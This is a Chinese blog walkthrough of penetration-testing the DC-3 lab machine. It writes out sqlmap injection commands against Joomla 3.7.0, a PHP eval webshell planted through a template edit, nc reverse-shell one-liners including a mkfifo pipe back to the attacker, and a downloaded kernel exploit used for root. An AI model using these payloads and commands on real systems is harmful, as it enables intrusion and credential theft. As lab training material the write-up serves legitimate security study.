DC-3靶机渗透测试

已于 2023-06-03 11:47:43 修改
阅读量436 收藏 10
点赞数
分类专栏: DC靶机系列 文章标签: web安全 服务器 linux
于 2023-04-09 14:50:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_64297700/article/details/130033252
版权

DC-3

靶机所需环境

  • 目标靶机:DC-3(192.168.160.167)
  • 攻击机:Kali Linux(192.168.160.156)

信息收集

  • 还是老样子,先探测同网段下的存活主机,如果没有该主机可能是因为没有设置为Nat模式,靶机默认为桥接模式,抱歉,之前忘记说下这个事情,勿怪😂;
arp-scan -l

在这里插入图片描述

  • 接下来对靶机进行扫描,查看开放的端口及其服务信息;
nmap -sV 192.168.160.167

在这里插入图片描述

  • 发现只开放了一个80端口,尝试访问;

在这里插入图片描述

  • 访问是个登录框,扫描一下其他目录,看能否有其他信息;
dirb http://192.168.160.167/

在这里插入图片描述

  • 上面扫描发现存在一个管理员目录,尝试访问;

在这里插入图片描述

Joomla模板

  • 还是一个登录框,但是值得注意的是这个标题———Joomla,不懂就问,Joomla是什么呢?

知识小拓展1
Joomla是一套全球知名的内容管理系统即JoomlaCMS(Content Management System, CMS),是网站的一个基础管理平台。Joomla使用PHP语言加上MySQL数据库所开发的软件系统,最新版本是4.2.8,可以在Linux、 Windows、MacOSX等各种不同的平台上执行;

  • 可见该靶机内容管理系统使用的是Joomla模板,查看Joomla版本,同时也看到了该管理员目录;

在这里插入图片描述

漏洞利用

  • 搜索一下该版本的漏洞,看看有什么可利用的;
searchsploit joomla 3.7.0

在这里插入图片描述

  • 查看对应版本的文件位置并将其复制到当前目录;
searchsploit -p php/webapps/42033.txt

在这里插入图片描述

  • 查看文件,发现是sqlmap命令,不会吧不会吧居然还有人没有😜sqlmap

在这里插入图片描述

查询数据库

  • 执行sqlmap命令查询数据库;
sqlmap -u "http://靶机IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -dbs -p list[fullordering]

在这里插入图片描述

查询表

  • 由于是Joomla模板,猜测是Joomladb数据库,查看该数据库里表;
sqlmap -u "http://靶机IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

在这里插入图片描述

查询字段

  • 查看#_user表里字段名;
sqlmap -u "http://靶机IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

在这里插入图片描述

查询用户名和密码

  • 查看用户和密码;
sqlmap -u "http://靶机IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

在这里插入图片描述

  • 将密码复制到新建的joomla.txt里,使用john工具进行密码破解;

在这里插入图片描述

用户: admin	密码: snoopy

知识小拓展2

第一次使用john时正常打印结果;
第二次使用john命令时不会输出结果,可使用--show参数打印上一次的结果;

一句话木马

  • 输入账号密码成功登录后台,点击DC-3查看信息;

在这里插入图片描述

  • 大概意思是告诉我们需要提升至root权限;

在这里插入图片描述

  • 既然是提权,首先想到了一句话木马,尝试寻找可能存在写文件或者上传文件的地方,发现有个可以进行编辑的模板;

在这里插入图片描述

  • 随便点击一篇内容进行发现有个new file可以进行文件编辑,找到编辑文件目录;
http://靶机IP/templates/beez3/html/

在这里插入图片描述

  • 创建一句话shell.php文件;

在这里插入图片描述

  • 记得写好后保存并关闭;
内容如下:
	<?php @eval($_POST['a']); ?>

在这里插入图片描述

  • 访问文件并复制路径;

在这里插入图片描述

蚁剑连接

  • 粘贴路径进行连接,密码为a;

在这里插入图片描述

  • kali开启监听1234端口;

在这里插入图片描述

  • 打开虚拟终端,查看权限确实是普通用户,执行方法一命令以反弹shell,如-e参数无法使用则执行方法二命令;
方法一: nc -e /bin/bash + kali机IP + 监听端口
方法二: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc + kali机IP + 监听端口 >/tmp/f

在这里插入图片描述

  • 查看kali机成功反弹shell;

在这里插入图片描述

  • 通过之前信息收集可知道该靶机系统为Ubuntu 16.04版本,搜索该版本可利用文件;

在这里插入图片描述

  • 查看文件路径并复制到当前目录;

在这里插入图片描述

  • 查看文件,发现EXP下载链接;
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

在这里插入图片描述

  • 下载,由于是国外网站下载会比较慢或下载失败等问题,这里提供了EXP资源;
    网盘链接:https://pan.baidu.com/s/1V8ja7TTD41Kz5hy-F5K1EA?pwd=9mla
    提取码:9mla

  • 下载好后复制到kali机root目录下,开启http服务将文件传输到靶机上;

pyhton2 -m SimpleHTPserver 1080

在这里插入图片描述

  • 靶机执行命令进行下载;
wget http://kali机IP:1080/39772.zip

在这里插入图片描述

权限提升

  • 下载后进行全部解压,进入文件夹解压要使用到的exp文件;

在这里插入图片描述

  • 解压后进入exp目录,执行sh文件此时生成一个doubleput可执行文件,接着执行该文件成功提升至root权限;

在这里插入图片描述
上一篇 > DC-2靶机渗透测试

下一篇 > DC-4靶机渗透测试

以上内容就是DC-3靶机渗透测试的全过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

以上内容仅供学习参考使用,切勿用于非法用途,切勿用于非法用途,切勿用于非法用途!!!重要的事情说三遍

渗透测试靶机--- Stapler-1
久恙502的博客
12-03 1859
渗透测试,打靶经历记录,大佬多多指点,谢谢!
DC-6靶机渗透测试
m0_66225311的博客
08-05 634
又是一个远古靶机,最近又做了一做,发现可以直接用50110.py文件一把梭获取权限,不需要之前那么繁琐的用html文件来反弹shell了。第一次没能进行尝试,要不然就能搞点不一样的了
DC-3靶机渗透
weixin_45349299的博客
01-02 684
title: DC-3靶机渗透详解tags: DC系列靶机categories: 学习笔记。
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法),零基础入门到精通,看这篇就够了!赶紧收藏!_渗透测试靶机
最新发布
yy1715713348的博客
04-25 828
Metasploit framework,简称msf。Metasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
DC-3靶机
m0_57954651的博客
10-01 1976
保存就上传 然后进行测试访问 (再根据joomla的特性 模块会单独放在一个文件夹里/templates/ 而beez3模块就在/templates/beez3/里面 刚才创建的webshell路径为)http://192.168.47.150/templates/beez3/shell.php。文本写的是漏洞产生的原因 描述和漏洞利用的方法 还附上了exp 最后一行的连接 (执行下两个文件 Linux系统下.(点)是执行某个文件的意思 (./compile.sh)
dc-3 靶机渗透学习
..
03-17 3747
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误。 vim /etc/network/interfacers 改成 vim /etc/network/interfaces Vulnhub靶机检测不到IP地址_阿帅start的博客-优快云博客_靶机没有ip 信息收集 使用nmap对当前网段进行扫描 nmap -sP 192.168.202.0/24 在排除kali攻击机和物理机ip后,对192.168.2...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-5靶机渗透测试
m0_66225311的博客
08-11 963
远古靶机,心血来潮又打了一次,发现这里的文件包含获取shell的有了更简便的方式,所以重新编辑添加了利用PHP过滤链直接进行文件包含漏洞的RCE的方法,利用php_filter_chain_generator.py工具生成相应的RCE过滤链即可。界面,发现只是一个普通的界面,但是再次访问的时候,发现下面的标识发生了改变,猜测这个界面存在文件包含,通过刷新来随机访问某一个界面。
DC-3靶机进行渗透测试
zll___的博客
03-13 1033
DC-3靶机进行渗透测试
vulnhub靶机渗透测式DC-3靶机渗透
m0_62008601的博客
05-05 1342
kali的ip:192.168.56.102 dc-3的ip:192.168.56.104 网络配置:dc-3用的是仅主机模式;kali用的是桥接网络。 首先我们先用ifconfig查看自己的ip地址得到192.168.56.102;接着使用arp-scan -l 扫描出同网段下其它主机。 然后利用nmap进行扫描靶机ip nmap -sV 192.168.56.104 可以发现开放了80端口,浏览器进行访问。 访问页面之后可以看到这次只有一个flag,一个入口且没有线索,在wap.
渗透测试靶机
anquanzushiye的博客
03-20 1247
网站今日更新PPT内容:1.从刑事个案看信息保护与数据利用 https://www.secshi.com/34183.html2.网络空间治理的中国法治...
DC系列靶机渗透之DC-3
weixin_52515588的博客
06-08 490
利用arp -scan -l扫描主机然后利用nmap查看开放的端口,如上图所示,80端口开放,那么接下来我们可以利用这个信息进行渗透访问一下80端口得到如上图所示的信息。然后使用whatweb对网站进行扫描,得到如下信息,可以知道网站是利用joomla部署的,那么我们就可以利用joomscan扫描 利用扫描工具扫出了网站后台,我们利用浏览器登录 如上图所示。我们在上述扫描结果中,能够看出来使用的joomla版本,接下来我们就可以利用msf查找漏洞 我们发现存在sql注入漏洞根据提示的路径,我们查看文件内容如
vulnhub渗透测试靶机DC-3
weixin_46128614的博客
01-11 876
靶机下载:https://www.vulnhub.com/entry/dc-3,312/ nmap 扫描只有一个80端口 直接访问 没有过多提示 用dirb跑发现了后台登录页面 是一个joomld搭的开源站 没有验证码 尝试爆破管理员密码 bp发现是snoopy 进入后台 找到template页面 编辑一个php文件 提醒:此处用的是冰蝎shell。msf的shell无法连上,system(...
渗透测试靶机DC-2
m0_70830611的博客
12-18 146
jerry和tom的密码成功爆了出来,对wp-admin进行下登陆。还有个7744端口的ssh可以利用,尝试下这两个用户能否登陆进去。git是以root权限执行的,git也照应了上一个flag的提示。尝试绕过rbash(这里直接借鉴了别人的,但还是不太懂)发现ls能列出home目录,然后还能直接用less查看。得到了三个用户admin、jerry、tom。很明显有个wp-admin的登陆网页。用jerry登陆进去后直接就找到了。jerry没有成功,但tom可以。后面的步骤做的有些云里雾里的。
DC-3靶机详细渗透过程
MRS_jianai的博客
11-30 927
dc-3靶机详细渗透教程
DC-3靶机的渗透学习
里丘~班诺的小屋
10-01 3414
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.133(未知) 靶机地址:https://www.vulnhub.com/entry/dc-32,312/ 二、战前准备 2.1IP地址确认 命令:arp-scan -l扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址,...
靶机渗透测试(HA: NARAK)
@小张小张的博客
10-24 3051
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
DC-1靶机渗透测试攻略及DC-2靶机简介
DC-1靶机渗透测试中,可能会用到的各种技术、工具和概念包括但不限于: - Nmap:一款强大的网络扫描工具,用于发现网络上的设备和开放的端口。 - Metasploit:一个著名的渗透测试平台,包含大量的已知漏洞利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值